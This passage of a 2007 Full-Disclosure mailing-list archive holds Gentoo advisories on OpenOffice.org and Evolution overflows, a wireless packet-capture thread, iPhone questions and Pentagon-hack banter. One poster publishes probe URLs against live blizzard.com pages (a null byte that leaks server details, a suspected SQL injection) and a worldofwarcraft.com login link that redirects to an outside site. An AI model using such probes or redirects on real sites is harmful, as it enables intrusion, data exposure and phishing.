with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got: Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15 Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc. Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789 Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help. -- Matthew Wollenweber mwollenweber at gmail.com | mjw at cyberwart.com www.cyberwart.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070630/420aa8b0/attachment-0001.html -------------- next part -------------- _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From jdo24 at cornell.edu Mon Jul 2 18:10:43 2007 From: jdo24 at cornell.edu (Joshua Ogle) Date: Mon, 2 Jul 2007 13:10:43 -0400 (EDT) Subject: [Full-disclosure] Best wireless card for packet capturing? Message-ID: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> Heya, For some research I'm doing I need to capture packets using my laptop in a public space. What is the best wireless card for doing so which will work with most of the packet capturing software on Windows, such as Ethereal? Thanks in advance for the help. -Josh From coderman at gmail.com Mon Jul 2 19:04:14 2007 From: coderman at gmail.com (coderman) Date: Mon, 2 Jul 2007 11:04:14 -0700 Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> Message-ID: <4ef5fec60707021104v3d2f4a85ge4a5fd4a61a6bea0@mail.gmail.com> On 7/2/07, Joshua Ogle wrote: > ... > For some research I'm doing I need to capture packets using my laptop in a > public space. What is the best wireless card for doing so which will work > with most of the packet capturing software on Windows... you'll want to get a copy of Airpcap drivers for win32. atheros or prism2 cards are my preference. ideally you should use multiple cards for best performance (built-in + 1 or 2 pccard?). remember that channel hopping affects capture, so locking on chan of interest is preferable to constantly hopping. best regards, From stacksmasher at gmail.com Mon Jul 2 19:05:10 2007 From: stacksmasher at gmail.com (Stack Smasher) Date: Mon, 2 Jul 2007 14:05:10 -0400 Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> Message-ID: <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> This is not the place to ask for a scooby snack or hand holding without getting attacked with a flamethrower, try the link below. They are very helpful to those just starting out. http://www.binrev.com/forums/ -- "If you see me laughing, you better have backups" On 7/2/07, Joshua Ogle wrote: > > Heya, > > For some research I'm doing I need to capture packets using my laptop in a > public space. What is the best wireless card for doing so which will work > with most of the packet capturing software on Windows, such as Ethereal? > > Thanks in advance for the help. > > -Josh > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- "If you see me laughing, you better have backups" -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/c59a40b3/attachment.html From jdo24 at cornell.edu Mon Jul 2 19:13:27 2007 From: jdo24 at cornell.edu (Joshua Ogle) Date: Mon, 2 Jul 2007 14:13:27 -0400 (EDT) Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> Message-ID: <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> Thanks for the input. I'm not just starting out on capturing packets or anything -- after all, I'm doing research and writing about something very related -- it's just that in a Windows environment I know very little about how to do things. I'm a Linux guy when it comes to this kind of activity and I know that it's typically very difficult to do things "right" as far as security testing goes in a Windows environment. Unfortunately, given the circumstances of the research, I am only able to use a Windows-based laptop, but I've now found (thanks to a contributer to the list) a live CD which will help with get into a Linux environment to do the work. Thanks again to you and the others for your input. -Josh > This is not the place to ask for a scooby snack or hand holding without > getting attacked with a flamethrower, try the link below. They are very > helpful to those just starting out. > > http://www.binrev.com/forums/ > > > > -- > "If you see me laughing, you better have backups" > > > > > > On 7/2/07, Joshua Ogle wrote: >> >> Heya, >> >> For some research I'm doing I need to capture packets using my laptop in >> a >> public space. What is the best wireless card for doing so which will >> work >> with most of the packet capturing software on Windows, such as Ethereal? >> >> Thanks in advance for the help. >> >> -Josh >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > "If you see me laughing, you better have backups" > From coderman at gmail.com Mon Jul 2 19:26:20 2007 From: coderman at gmail.com (coderman) Date: Mon, 2 Jul 2007 11:26:20 -0700 Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> Message-ID: <4ef5fec60707021126h652b6ec9r75df020c66b0b481@mail.gmail.com> On 7/2/07, Joshua Ogle wrote: > ... I've now found a live CD which will help with get > into a Linux environment to do the work. speaking of which, when is backtrack going to get an updated aircrack-ng? :) ... beware airodump-ng till then. From stacksmasher at gmail.com Mon Jul 2 19:32:18 2007 From: stacksmasher at gmail.com (Stack Smasher) Date: Mon, 2 Jul 2007 14:32:18 -0400 Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> Message-ID: <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com> You have to understand the laptop and OS are just tools to obtain whatever information you need. Linux and Window$ are just a way of running applications to help you achieve your goal. Don't think of Linux as "Good" and "Windows" as bad as far as security is concerned. Its the mis-configured system and network in general that make it insecure. Not only that, windows keeps us security guys employed ; ) -- "If you see me laughing, you better have backups" On 7/2/07, Joshua Ogle wrote: > > Thanks for the input. I'm not just starting out on capturing packets or > anything -- after all, I'm doing research and writing about something very > related -- it's just that in a Windows environment I know very little > about how to do things. I'm a Linux guy when it comes to this kind of > activity and I know that it's typically very difficult to do things > "right" as far as security testing goes in a Windows environment. > Unfortunately, given the circumstances of the research, I am only able to > use a Windows-based laptop, but I've now found (thanks to a contributer to > the list) a live CD which will help with get into a Linux environment to > do the work. > > Thanks again to you and the others for your input. > > -Josh > > > This is not the place to ask for a scooby snack or hand holding without > > getting attacked with a flamethrower, try the link below. They are very > > helpful to those just starting out. > > > > http://www.binrev.com/forums/ > > > > > > > > -- > > "If you see me laughing, you better have backups" > > > > > > > > > > > > On 7/2/07, Joshua Ogle wrote: > >> > >> Heya, > >> > >> For some research I'm doing I need to capture packets using my laptop > in > >> a > >> public space. What is the best wireless card for doing so which will > >> work > >> with most of the packet capturing software on Windows, such as > Ethereal? > >> > >> Thanks in advance for the help. > >> > >> -Josh > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > >> > > > > > > > > -- > > "If you see me laughing, you better have backups" > > > > > -- "If you see me laughing, you better have backups" -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/b4fc1f2b/attachment.html From mike.vasquez at gmail.com Mon Jul 2 19:34:54 2007 From: mike.vasquez at gmail.com (Mike Vasquez) Date: Mon, 2 Jul 2007 11:34:54 -0700 Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <4ef5fec60707021126h652b6ec9r75df020c66b0b481@mail.gmail.com> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> <4ef5fec60707021126h652b6ec9r75df020c66b0b481@mail.gmail.com> Message-ID: <28f529ba0707021134s7c9898c5i5e6063138fb48426@mail.gmail.com> ya but has anyone seen it exploited in the wild, outside of perhaps defcon/blackhat/conferences, etc? I think I have a greater threat of spilling a soda on my laptop. On 7/2/07, coderman wrote: > > On 7/2/07, Joshua Ogle wrote: > > ... I've now found a live CD which will help with get > > into a Linux environment to do the work. > > speaking of which, when is backtrack going to get an updated aircrack-ng? > :) > ... beware airodump-ng till then. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/fcff7838/attachment.html From mike.vasquez at gmail.com Mon Jul 2 19:38:22 2007 From: mike.vasquez at gmail.com (Mike Vasquez) Date: Mon, 2 Jul 2007 11:38:22 -0700 Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com> Message-ID: <28f529ba0707021138v6410098brf850d1bb9825d138@mail.gmail.com> I think it was more as a statement regarding the maturity of security tools on each platform. for instance, for wireless, linux has far more tools, and a wider variety, for that work, than windows, and the tools have fewer limitations... and that's an opinion from an mcse+i/mcdba/mcse:security. so more often than not, for research/security work: linux good/windows bad. not as a statement regarding which platform is better in general, or more secure, etc. just simply from the vantage point of needed to do security work. On 7/2/07, Stack Smasher wrote: > > > You have to understand the laptop and OS are just tools to obtain whatever > information you need. Linux and Window$ are just a way of running > applications to help you achieve your goal. Don't think of Linux as "Good" > and "Windows" as bad as far as security is concerned. Its the mis-configured > system and network in general that make it insecure. Not only that, windows > keeps us security guys employed ; ) > > > -- > "If you see me laughing, you better have backups" > > > > > > On 7/2/07, Joshua Ogle < jdo24 at cornell.edu> wrote: > > > > Thanks for the input. I'm not just starting out on capturing packets or > > > > anything -- after all, I'm doing research and writing about something > > very > > related -- it's just that in a Windows environment I know very little > > about how to do things. I'm a Linux guy when it comes to this kind of > > activity and I know that it's typically very difficult to do things > > "right" as far as security testing goes in a Windows environment. > > Unfortunately, given the circumstances of the research, I am only able > > to > > use a Windows-based laptop, but I've now found (thanks to a contributer > > to > > the list) a live CD which will help with get into a Linux environment to > > do the work. > > > > Thanks again to you and the others for your input. > > > > -Josh > > > > > This is not the place to ask for a scooby snack or hand holding > > without > > > getting attacked with a flamethrower, try the link below. They are > > very > > > helpful to those just starting out. > > > > > > http://www.binrev.com/forums/ > > > > > > > > > > > > -- > > > "If you see me laughing, you better have backups" > > > > > > > > > > > > > > > > > > On 7/2/07, Joshua Ogle wrote: > > >> > > >> Heya, > > >> > > >> For some research I'm doing I need to capture packets using my laptop > > in > > >> a > > >> public space. What is the best wireless card for doing so which will > > >> work > > >> with most of the packet capturing software on Windows, such as > > Ethereal? > > >> > > >> Thanks in advance for the help. > > >> > > >> -Josh > > >> > > >> _______________________________________________ > > >> Full-Disclosure - We believe in it. > > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > >> Hosted and sponsored by Secunia - http://secunia.com/ > > >> > > > > > > > > > > > > -- > > > "If you see me laughing, you better have backups" > > > > > > > > > > > > -- > "If you see me laughing, you better have backups" > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/50b9140e/attachment.html From falco at gentoo.org Mon Jul 2 22:16:54 2007 From: falco at gentoo.org (Raphael Marichez) Date: Mon, 2 Jul 2007 23:16:54 +0200 Subject: [Full-disclosure] [ GLSA 200707-02 ] OpenOffice.org: Two buffer overflows Message-ID: <20070702211654.GB2021@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenOffice.org: Two buffer overflows Date: July 02, 2007 Bugs: #181773 ID: 200707-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in OpenOffice.org, allowing for the remote execution of arbitrary code. Background ========== OpenOffice.org is an open source office productivity suite, including word processing, spreadsheet, presentation, drawing, data charting, formula editing, and file conversion facilities. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-office/openoffice < 2.2.1 >= 2.2.1 2 app-office/openoffice-bin < 2.2.1 >= 2.2.1 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== John Heasman of NGSSoftware has discovered a heap-based buffer overflow when parsing the "prdata" tag in RTF files where the first token is smaller than the second one (CVE-2007-0245). Additionally, the OpenOffice binary program is shipped with a version of FreeType that contains an integer signedness error in the n_points variable in file truetype/ttgload.c, which was covered by GLSA 200705-22 (CVE-2007-2754). Impact ====== A remote attacker could entice a user to open a specially crafted document, possibly leading to execution of arbitrary code with the rights of the user running OpenOffice.org. Workaround ========== There is no known workaround at this time. Resolution ========== All OpenOffice.org users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-2.2.1" All OpenOffice.org binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-bin-2.2.1" References ========== [ 1 ] CVE-2007-0245 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0245 [ 2 ] CVE-2007-2754 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754 [ 3 ] GLSA 200705-22 http://www.gentoo.org/security/en/glsa/glsa-200705-22.xml Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200707-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/55ae6060/attachment.bin From falco at gentoo.org Mon Jul 2 22:30:11 2007 From: falco at gentoo.org (Raphael Marichez) Date: Mon, 2 Jul 2007 23:30:11 +0200 Subject: [Full-disclosure] [ GLSA 200707-03 ] Evolution: User-assisted remote execution of arbitrary code Message-ID: <20070702213011.GD2021@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Evolution: User-assisted remote execution of arbitrary code Date: July 02, 2007 Bugs: #182011 ID: 200707-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== The IMAP client of Evolution contains a vulnerability potentially leading to the execution of arbitrary code. Background ========== Evolution is the mail client of the GNOME desktop environment. Camel is the Evolution Data Server module that handles mail functions. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 gnome-extra/evolution-data-server < 1.8.3-r5 >= 1.8.3-r5 *>= 1.6.2-r1 Description =========== The imap_rescan() function of the file camel-imap-folder.c does not properly sanitize the "SEQUENCE" response sent by an IMAP server before being used to index arrays. Impact ====== A malicious or compromised IMAP server could trigger the vulnerability and execute arbitrary code with the permissions of the user running Evolution. Workaround ========== There is no known workaround at this time. Resolution ========== All Evolution users should upgrade evolution-data-server to the latest version: # emerge --sync # emerge --ask --oneshot --verbose "gnome-extra/evolution-data-server" References ========== [ 1 ] CVE-2007-3257 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3257 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200707-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/96a1dba9/attachment.bin From kefka at kevinbeardsucks.com Mon Jul 2 22:47:33 2007 From: kefka at kevinbeardsucks.com (kefka) Date: Mon, 02 Jul 2007 17:47:33 -0400 Subject: [Full-disclosure] Best wireless card for packet capturing? In-Reply-To: <28f529ba0707021138v6410098brf850d1bb9825d138@mail.gmail.com> References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com> <28f529ba0707021138v6410098brf850d1bb9825d138@mail.gmail.com> Message-ID: <46897275.7080905@kevinbeardsucks.com> It's the same joke at work, most of us do not like Microsoft security but it keeps us employed (despite their efforts to taint the industry). ----------------------- Mike Vasquez wrote: > I think it was more as a statement regarding the maturity of security > tools on each platform. for instance, for wireless, linux has far > more tools, and a wider variety, for that work, than windows, and the > tools have fewer limitations... and that's an opinion from an > mcse+i/mcdba/mcse:security. > > so more often than not, for research/security work: linux good/windows > bad. not as a statement regarding which platform is better in > general, or more secure, etc. just simply from the vantage point of > needed to do security work. > > On 7/2/07, *Stack Smasher* > wrote: > > > You have to understand the laptop and OS are just tools to obtain > whatever information you need. Linux and Window$ are just a way of > running applications to help you achieve your goal. Don't think of > Linux as "Good" and "Windows" as bad as far as security is > concerned. Its the mis-configured system and network in general > that make it insecure. Not only that, windows keeps us security > guys employed ; ) > > > -- > > "If you see me laughing, you better have backups" > > > > > > On 7/2/07, * Joshua Ogle* < jdo24 at cornell.edu > > wrote: > > Thanks for the input. I'm not just starting out on capturing > packets or > anything -- after all, I'm doing research and writing about > something very > related -- it's just that in a Windows environment I know very > little > about how to do things. I'm a Linux guy when it comes to this > kind of > activity and I know that it's typically very difficult to do > things > "right" as far as security testing goes in a Windows environment. > Unfortunately, given the circumstances of the research, I am > only able to > use a Windows-based laptop, but I've now found (thanks to a > contributer to > the list) a live CD which will help with get into a Linux > environment to > do the work. > > Thanks again to you and the others for your input. > > -Josh > > > This is not the place to ask for a scooby snack or hand > holding without > > getting attacked with a flamethrower, try the link below. > They are very > > helpful to those just starting out. > > > > http://www.binrev.com/forums/ > > > > > > > > -- > > "If you see me laughing, you better have backups" > > > > > > > > > > > > On 7/2/07, Joshua Ogle > wrote: > >> > >> Heya, > >> > >> For some research I'm doing I need to capture packets using > my laptop in > >> a > >> public space. What is the best wireless card for doing so > which will > >> work > >> with most of the packet capturing software on Windows, such > as Ethereal? > >> > >> Thanks in advance for the help. > >> > >> -Josh > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > >> > > > > > > > > -- > > "If you see me laughing, you better have backups" > > > > > > > > -- > > "If you see me laughing, you better have backups" > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From kefka at kevinbeardsucks.com Mon Jul 2 23:01:03 2007 From: kefka at kevinbeardsucks.com (kefka) Date: Mon, 02 Jul 2007 18:01:03 -0400 Subject: [Full-disclosure] Blizzard.com - Information disclosure. Message-ID: <4689759F.30103@kevinbeardsucks.com> Blizzard.com fails to properly sanitize user-supplied input resulting in information disclosure: http://www.blizzard.com/wow/ssotd/screenshot.aspx?imageindex=1027&Set=%00 Note the fact that their webroot is on the C: partition. "C:\web\blizzard.com\wow\ssotd\screenshot.aspx" *Version Information:* Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET Version:1.1.4322.2032 <-- lol (outdated/missing a hotfix or two) http://www.blizzard.com/wow/ssotd/screenshot.aspx?imageindex=1027'&Set=0 <--- probably vulnerable to SQL injection but I don't want to try it. http://www.blizzard.com/wow/ssotd/screenshot.aspx?imageindex=1027&Set=0 <--- should recieve this image, not the first image...meaning something is happening to the query From kefka at kevinbeardsucks.com Mon Jul 2 23:12:13 2007 From: kefka at kevinbeardsucks.com (kefka) Date: Mon, 02 Jul 2007 18:12:13 -0400 Subject: [Full-disclosure] Worldofwarcraft.com - Redirection Message-ID: <4689783D.5020808@kevinbeardsucks.com> https://www.worldofwarcraft.com/login/login?service=http://kefkahacks.net/ User will be redirected once they login. From simon at snosoft.com Tue Jul 3 00:20:05 2007 From: simon at snosoft.com (Simon Smith) Date: Mon, 02 Jul 2007 19:20:05 -0400 Subject: [Full-disclosure] Pentagon Email Servers Hacked In-Reply-To: <4689783D.5020808@kevinbeardsucks.com> Message-ID: So they interview a non-technical, non-email using person about a hack on the pentagon? *scratches head* ------------------------------------ SNOsoft Research Team http://snosoft.blogspot.com From simon at snosoft.com Tue Jul 3 00:22:31 2007 From: simon at snosoft.com (Simon Smith) Date: Mon, 02 Jul 2007 19:22:31 -0400 Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) In-Reply-To: Message-ID: Oh... And the URL would be helpful. :P http://www.computerworld.com/action/article.do?command=viewArticleBasic&arti cleId=9025442&source=NLT_VVR&nlid=37 On 7/2/07 7:20 PM, "Simon Smith" wrote: > So they interview a non-technical, non-email using person about a hack on > the pentagon? > > *scratches head* > > > ------------------------------------ > SNOsoft Research Team > http://snosoft.blogspot.com > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From suckure at gmail.com Tue Jul 3 03:12:56 2007 From: suckure at gmail.com (secure poon) Date: Mon, 2 Jul 2007 19:12:56 -0700 Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) In-Reply-To: References: Message-ID: <61f54f4f0707021912k2a124f35q8bce8dd6b28f4933@mail.gmail.com> old news.. On 7/2/07, Simon Smith wrote: > > Oh... And the URL would be helpful. :P > > > http://www.computerworld.com/action/article.do?command=viewArticleBasic&arti > cleId=9025442&source=NLT_VVR&nlid=37 > > On 7/2/07 7:20 PM, "Simon Smith" wrote: > > > So they interview a non-technical, non-email using person about a hack > on > > the pentagon? > > > > *scratches head* > > > > > > ------------------------------------ > > SNOsoft Research Team > > http://snosoft.blogspot.com > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/32daa696/attachment.html From simon at snosoft.com Tue Jul 3 04:06:32 2007 From: simon at snosoft.com (Simon Smith) Date: Mon, 02 Jul 2007 23:06:32 -0400 Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) In-Reply-To: <61f54f4f0707021912k2a124f35q8bce8dd6b28f4933@mail.gmail.com> Message-ID: Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome? On 7/2/07 10:12 PM, "secure poon" wrote: > old news.. > > On 7/2/07, Simon Smith wrote: >> Oh... And the URL would be helpful. :P >> >> http://www.computerworld.com/action/article.do?command=viewArticleBasic&arti >> > arti> >> cleId=9025442&source=NLT_VVR&nlid=37 >> >> On 7/2/07 7:20 PM, "Simon Smith" < simon at snosoft.com >> > wrote: >> >>> > So they interview a non-technical, non-email using person about a hack on >>> > the pentagon? >>> > >>> > *scratches head* >>> > >>> > >>> > ------------------------------------ >>> > SNOsoft Research Team >>> > http://snosoft.blogspot.com >>> > >>> > >>> > _______________________________________________ >>> > Full-Disclosure - We believe in it. >>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> > Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/40bab645/attachment.html From yahoo at jimpop.com Tue Jul 3 04:33:02 2007 From: yahoo at jimpop.com (Jim Popovitch) Date: Mon, 02 Jul 2007 23:33:02 -0400 Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) In-Reply-To: References: Message-ID: <1183433582.2817.3.camel@localhost> On Mon, 2007-07-02 at 23:06 -0400, Simon Smith wrote: > Old... As in you have no concept of time because it just came out? Or > old.. As in you knew about this before anyone else because you are > awesome? Old as in this happened yesterday, last week, last month, last year, last decade, last millennium, etc. The US DoD gets hit all the time... not because they are so much insecure, but because they are such a primary target. It's a fact of life, just like doctors and nurses are the most vulnerable to contract a disease. There are precautions, and they are taken, but the odds are greater. Now, back to your normal programming.... -Jim P. From sragan at indy.rr.com Tue Jul 3 04:31:40 2007 From: sragan at indy.rr.com (Steve Ragan) Date: Mon, 2 Jul 2007 23:31:40 -0400 Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) In-Reply-To: References: <61f54f4f0707021912k2a124f35q8bce8dd6b28f4933@mail.gmail.com> Message-ID: <13cc01c7bd22$b0a1cd00$6601a8c0@computer88a6b8> Simon, That happened back in June even the article is dated June 21. It is funny however, that the person quoted in the transcripts of the press conference said he doesn't use email. Steve _____ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Simon Smith Sent: Monday, July 02, 2007 11:07 PM To: secure poon; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome? On 7/2/07 10:12 PM, "secure poon" wrote: old news.. On 7/2/07, Simon Smith wrote: Oh... And the URL would be helpful. :P http://www.computerworld.com/action/article.do?command=viewArticleBasic &arti cleId=9025442&source=NLT_VVR&nlid=37 On 7/2/07 7:20 PM, "Simon Smith" < simon at snosoft.com > wrote: > So they interview a non-technical, non-email using person about a hack on > the pentagon? > > *scratches head* > > > ------------------------------------ > SNOsoft Research Team > http://snosoft.blogspot.com > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _____ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/98e16728/attachment.html From simon.cooper at gmail.com Tue Jul 3 06:24:24 2007 From: simon.cooper at gmail.com (Simon Cooper) Date: Mon, 2 Jul 2007 22:24:24 -0700 Subject: [Full-disclosure] iPhone Security Settings In-Reply-To: <468825BA.1050500@infosecurity.ch> References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch> Message-ID: On 7/1/07, Fabio Pietrosanti (naif) wrote: ... text zapped... > * What's bom? /System/Library/PrivateFrameworks/Bom.framework/Bom On any Mac OS X system, type "man lsbom" 